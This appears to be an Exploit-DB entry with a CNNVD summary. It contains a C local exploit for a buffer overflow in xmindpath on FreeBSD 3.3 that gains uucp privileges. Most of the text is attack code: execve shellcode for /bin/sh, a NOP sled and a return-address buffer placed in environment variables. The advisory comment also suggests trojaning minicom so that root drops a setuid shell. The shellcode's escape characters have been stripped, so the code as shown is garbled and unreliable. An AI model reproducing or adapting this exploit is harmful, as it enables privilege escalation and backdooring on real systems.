https://www.exploit-db.com/exploits/19652
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199912-006

FreeBSDxmindpath存在缓冲区溢出漏洞。本地用户可以通过-f参数获得权限。

/*
source: http://www.securityfocus.com/bid/839/info

The version of xmindpath shipped with FreeBSD 3.3 can be locally exploited via overrunning a buffer of predefined length. It is possible to gain the effective userid of uucp through this vulnerability. It may be possible, after attaining uucp priviliges, to modify binaries to which uucp has write access to and trojan them to further elevate priviliges), ie: modify minicom so that when root runs it, drops a suid shell somewhere. 
*/

/*
 *
 * FreeBSD 3.3 xmindpath exploit gives euid uucp
 * Compile: gcc -o xmindx xmindx.c
 * Usage: ./xmindx <offset>
 /path/to/mindpath -f $RET
 * Brock Tellier <[email protected]>
 *
 */
 
 #include <stdlib.h>
 #include <stdio.h>
 

 char shell[]= /* [email protected] */
 "xebx35x5ex59x33xc0x89x46xf5x83xc8x07x66x89x46xf9"
 "x8dx1ex89x5ex0bx33xd2x52x89x56x07x89x56x0fx8dx46"
 "x0bx50x8dx06x50xb8x7bx56x34x12x35x40x56x34x12x51"
 "x9a>:)(:<xe8xc6xffxffxff/bin/sh";
 

 #define EGGLEN 2048
 #define RETLEN 279
 #define ALIGN 3
 #define NOP 0x90

 int main(int argc, char *argv[]) {
 

 long int offset=0;
 int i;
 int egglen = EGGLEN;
 int retlen = RETLEN;
 long int addr = 0xbfbfcfa8;
 char egg[EGGLEN];
 char ret[RETLEN];


 if (argc == 2) offset = atoi(argv[1]);


 addr=addr + offset;

 fprintf(stderr, "FreeBSD xmindpath exploit /path/to/xmindpath -f $RETn");
 fprintf(stderr, "Brock Tellier [email protected]");
 fprintf(stderr, "Using addr: 0x%xn", addr);

 memset(egg,NOP,egglen);
 memcpy(egg+(egglen - strlen(shell) - 1),shell,strlen(shell));
  

 for(i=ALIGN;i< retlen;i+=4)
 *(int *)&ret[i]=addr;
 

 memcpy(egg, "EGG=", 4);
 putenv(egg);
 memcpy(ret,"RET=",4);
 putenv(ret);

 system("/usr/local/bin/bash");

 }

来源:BID
名称:839
链接:http://www.securityfocus.com/bid/839
来源:OSVDB
名称:1150
链接:http://www.osvdb.org/1150